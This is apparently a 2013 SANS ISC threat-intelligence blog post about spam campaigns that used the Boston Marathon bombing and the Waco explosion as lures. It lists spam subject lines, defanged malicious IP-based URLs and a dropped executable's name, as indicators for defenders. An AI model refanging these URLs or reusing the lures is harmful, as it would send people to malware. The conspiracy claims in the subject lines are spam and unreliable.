Threat Level: green Handler on Duty: Daniel Wesemann

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

UPDATEDx1: Boston-Related Malware Campaigns Have Begun - Now with Waco Plant Explosion Fun

Published: 2013-04-17
Last Updated: 2013-04-18 15:12:32 UTC
by John Bambenek (Version: 1)
2 comment(s)

UPDATE: 04-18-2013 @ 10:10 AM CDT -

Some of the spam campaigns are now changing over to the Waco plant explosion. Basically the lure is the same, a subject that talks mentions the video and then an IP only url with /texas.html or /news.html.  The landing page has a few embedded YouTube videos and an iframe with malicious content at the end.

** End Update 1 **

About mid-afternoon yesterday (Central time - US), Boston related spam campaigns have begun. The general "hook" is that it sends a URL with a subject about the video from the explosions. Similar to when Osama Bin Laden was killed and fake images were used as a hook, in this case, the video is relevant to the story and being used as a hook.  Right now, very roughly 10-20% of all spam is related to this (some spamtraps reporting more, some less).  Similar IPs have also been sending pump & dump scams so likely the same group has re-tasted itself.

Here is a list of subjects I've seen hit spam traps:

Subject: 2 Explosions at Boston Marathon
Subject: Aftermath to explosion at Boston Marathon
Subject: Arbitron. Dial Global. Boston Bombings
Subject: Boston Explosion Caught on Video
Subject: BREAKING - Boston Marathon Explosion
Subject: Explosion at Boston Marathon
Subject: Explosion at the Boston Marathon
Subject: Explosions at Boston Marathon
Subject: Explosions at the Boston Marathon
Subject: Opinion: Boston Marathon Explosions made by radical Gays? Really? - CNN.com
Subject: Opinion: Boston Marathon Explosions - Romney Benefits? - CNN.com
Subject: Opinion: Boston Marathon Worse Sensation - Osama bin Laden still alive!? - CNN.com
Subject: Opinion: FBI knew about bombs 3 days before Boston Marathon - Why and Who Benefits? - CNN.com
Subject: Opinion: Osama Bin Laden video about Boston Marathon Explosions - bad news for all the world. - CNN.com
Subject:[SPAM] 2 Explosions at Boston Marathon
Subject:[SPAM] Boston Explosion Caught on Video
Subject:[SPAM] Explosions at the Boston Marathon
Subject:[SPAM] Video of Explosion at the Boston Marathon 2013
Subject: Stiri:EXPLOZIILE de la maratonul din Boston/Spaga este negociata la granita Romaniei/A inventat bautura care INLOCUIESTE MANCAREA/TUNELUL cu mecanisme de NEINTELES al lui STALIN/70 % din infrastructura RCS-RDS este amplasata ILEGAL/BOMBA ANULUI IN SHOWBIZ
Subject: Video of Explosion at the Boston Marathon 2013

Here is a list of malicious URLs in those messages (use at your own risk):

hxxp://109.87.205.222/boston.html
hxxp://109.87.205.222/news.html
hxxp://110.92.80.47/boston.html
hxxp://110.92.80.47/news.html
hxxp://118.141.37.122/boston.html
hxxp://118.141.37.122/news.html
hxxp://176.241.148.169/boston.html
hxxp://176.241.148.169/news.html
hxxp://178.137.100.12/boston.html
hxxp://178.137.100.12/news.html
hxxp://178.137.120.224/boston.html
hxxp://178.137.120.224/news.html
hxxp://188.2.164.112/boston.html
hxxp://188.2.164.112/news.html
hxxp://190.245.177.248/boston.html
hxxp://190.245.177.248/news.html
hxxp://212.75.18.190/boston.html
hxxp://212.75.18.190/news.html
hxxp://213.34.205.27/boston.html
hxxp://213.34.205.27/news.html
hxxp://217.145.222.14/boston.html
hxxp://217.145.222.14/news.html
hxxp://219.198.196.116/boston.html
hxxp://219.198.196.116/news.html
hxxp://24.180.60.184/boston.html
hxxp://24.180.60.184/news.html
hxxp://24.214.242.227/boston.html
hxxp://24.214.242.227/news.html
hxxp://31.133.84.65/boston.html
hxxp://31.133.84.65/news.html
hxxp://37.229.215.183/boston.html
hxxp://37.229.215.183/news.html
hxxp://37.229.92.116/boston.html
hxxp://37.229.92.116/news.html
hxxp://46.233.4.113/boston.html
hxxp://46.233.4.113/news.html
hxxp://46.233.4.113/xxxxx.html
hxxp://50.136.163.28/boston.html
hxxp://50.136.163.28/news.html
hxxp://61.63.123.44/boston.html
hxxp://61.63.123.44/news.html
hxxp://62.45.148.76/boston.html
hxxp://62.45.148.76/news.html
hxxp://62.45.148.76/xxxxx.html
hxxp://78.90.133.133/boston.html
hxxp://78.90.133.133/news.html
hxxp://83.170.192.154/boston.html
hxxp://83.170.192.154/news.html
hxxp://85.198.81.26/boston.html
hxxp://85.198.81.26/news.html
hxxp://85.204.15.40/boston.html
hxxp://85.204.15.40/news.html
hxxp://85.217.234.98/boston.html
hxxp://85.217.234.98/news.html
hxxp://91.241.177.162/boston.html
hxxp://91.241.177.162/news.html
hxxp://91.241.177.162/xxxxx.html
hxxp://94.153.15.249/boston.html
hxxp://94.153.15.249/news.html
hxxp://94.28.49.130/boston.html
hxxp://94.28.49.130/news.html
hxxp://95.69.141.121/boston.html
hxxp://95.69.141.121/news.html
hxxp://95.87.6.156/boston.html
hxxp://95.87.6.156/news.html
 
Some of these are already down, but basically plain pages with a handful of embedded YouTube videos that are relevant.  Early versions would redirect to fetch a file: boston___________AVI.exe and on down the rabbit hole it goes.  It was pretty loud so most AV should have sigs already.
 
H/T to Nick Tabick and Corbin Souffrant, two of my students at the University of Illinois who helped dig into this last night.
 

--
John Bambenek
bambenek \at\ gmail /dot/ com
Bambenek Consulting

2 comment(s)
Diary Archives